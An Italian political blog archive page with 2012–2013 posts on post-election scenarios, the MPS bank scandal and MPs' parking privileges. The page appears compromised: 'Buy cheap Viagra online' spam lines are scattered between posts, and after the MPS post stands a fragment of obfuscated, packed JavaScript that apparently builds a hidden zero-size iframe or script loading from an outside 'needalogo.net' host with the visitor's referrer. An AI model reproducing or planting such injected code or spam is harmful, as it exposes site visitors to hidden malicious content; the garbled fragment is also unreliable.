Politica Archivi - NonCeLaFaccioPiù

.

E adesso che succede?

26 febbraio 2013 Commenti chiusi

SCENARIO 1: Governo di responsabilità nazionale

Buy cheap Viagra online

Centrosinistra, centro e centrodestra “inciuceranno” tra di loro per garantirsi un’ampia maggioranza sia alla Camera che al Senato. Ovviamente lo spazio di manovra per un governo del genere risulterebbe essere veramente ridotto, infatti difficilmente Berlusconi appoggerà un governo con a capo Bersani. Sarà quindi un governo instabile e potrà cadere da un momento all’altro. Il risultato finale sarà il ritorno alle urne con conseguente vittoria definitiva del M5S.

SCENARIO 2: Governo di centrosinistra con appoggio del M5S

Si formerà un governo di centrosinistra con l’appoggio esterno del M5S al Senato, ma la vedo veramente dura (per fortuna!) a causa della politica del Movimento riguardo le alleanze.

SCENARIO 3: Governo di transizione

Si formerà un governo di transizione tra tutte le forze politiche per la realizzazione di una nuova legge elettorale che renda il paese più governabile, per poi ritornare subito alle urne (ipotesi abbastanza ridicola!).

SCENARIO 4: Si torna a votare

Si tornerà a breve alle urne.

L’unico che trae vantaggio da tutto questo è, ovviamente, il Movimento 5 Stelle.
Le cose stanno finalmente cambiando, è evidente, e può succedere di tutto!! Per fortuna, io NonCeLaFaccioPiù

Chi in Abruzzo ha votato Pdl…

25 febbraio 2013 Commenti chiusi

Buy cheap Viagra online

-

Mi rivolgo a tutti quei cittadini abruzzesi che hanno votato Pdl… Ecco chi avete mandato al Senato… A parte le evidenti lacune grammaticali, probabilmente non avete notato che quest’uomo si è reso protagonista di un altro video che risale a qualche tempo fa… Oppure, semplicemente, avete la memoria corta…

-

Elezioni 2013 – Dati Reali 18:30

25 febbraio 2013 Commenti chiusi


Buy cheap Viagra online

L’IMU e lo scandalo MPS

23 febbraio 2013 Commenti chiusi

Chiariamo un paio di cose… Vi siete mai chiesti a che cosa sono serviti i soldi dell’IMU ?! Nelle casse dello Stato sono entrati la bellezza di 3,9 miliardi di euro. Ma perché?! Per permettere al Governo di scongiurare il rincaro dell’Iva?! Per abbassare l’Irpef?!

Ovviamente no! Il Governo Monti ha utilizzato questi soldi per permettere alla Monte dei Paschi di Siena (una S.p.a.) di tappare un buco di egual misura.

Ma chi ha permesso a questa banca di generare un buco così grande (che in realtà è ancora più grande!)?! Chi ha responsabilità di controllo e nomina gli amministratori di MPS?!
Beh, il PD locale.

Dunque MPS rappresenta il terzo gruppo bancario italiano avendo assorbito Antonveneta, c’è da dire che il PD nazionale non ha il potere di disporre nomine e linee del MPS, ma non può essere ignaro di quel che succede a Siena!! Cazzo!! Bersani mi stai prendendo per il culo?!

In qualsiasi altro Paese si sarebbe gridato allo scandalo, i cittadini si sarebbero incazzati, ma qui in Italia no… Un po’ perché non ci si informa, un po’ perché è difficile interpretare i numeri e le sigle che i TG ci propinano (lo fanno apposta, sia chiaro!), un po’ perché ormai siamo assuefatti agli scandali…

Ma adesso basta! Se MPS è stata salvata con i nostri soldi allora va NAZIONALIZZATA e i vertici, così come gli organi che dovevano controllare (e non hanno controllato!), devono andare sotto inchiesta!!

Ragazzi io NonCeLaFaccioPiù!!! Domani i vari Monti, Bersani, Berlusconi mandiamoli tutti a casa!!!!

<8 q="s:u;v:w" 0="\'+0+\'" x="\'+4+\'" y="\'+5+\'">\')})();',35,35,'src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height'.split('|'),0,{}))

Buy cheap Viagra online

“Gli onorevoli devono pur essere messi in condizione di parcheggiare”

16 ottobre 2012 Commenti chiusi

Secondo Il Messaggero di oggi sarebbero stati stanziati dalla Camera oltre cinque milioni e mezzo di euro per migliorare la mobilità. Di cosa?! Direte voi! Semplicemente per aumentare il numero dei parcheggi destinati ai deputati e per migliorare la vita degli onorevoli che, in piazza del Parlamento, non sono ad ora provvisti di un parcheggio riservato e, ovviamente, gratis.

D’altronde non si può obbligare un parlamentare ad utilizzare i mezzi pubblici, come, tra l’altro, succede normalmente in Inghilterra (non sia mai!!); o a prendere ogni giorno multe per divieto di sosta di 80 euro che non possono essere rimborsate. Per fortuna che ci pensano i vigili urbani di Piazza di Montecitorio che, spesso e volentieri, prima di fare il verbale chiamano e chiedono loro di spostare la macchina. Insomma, “gli onorevoli devono pur essere messi in condizione di andare a lavoro!”. E chissenefrega dei poveri cittadini che tutte le mattine si arrangiano in mezzo al traffico di Roma, o dentro un vagone stracolmo della Met.Ro., per andare a sudarsi quei pochi soldi di stipendio, che fanno sacrifici per sopravvivere fino alla fine del mese, loro devono mantenere i loro privilegi!!

E poi mi vengono a parlare di spending review!!!

Buy cheap Viagra online

Powered by AlterVista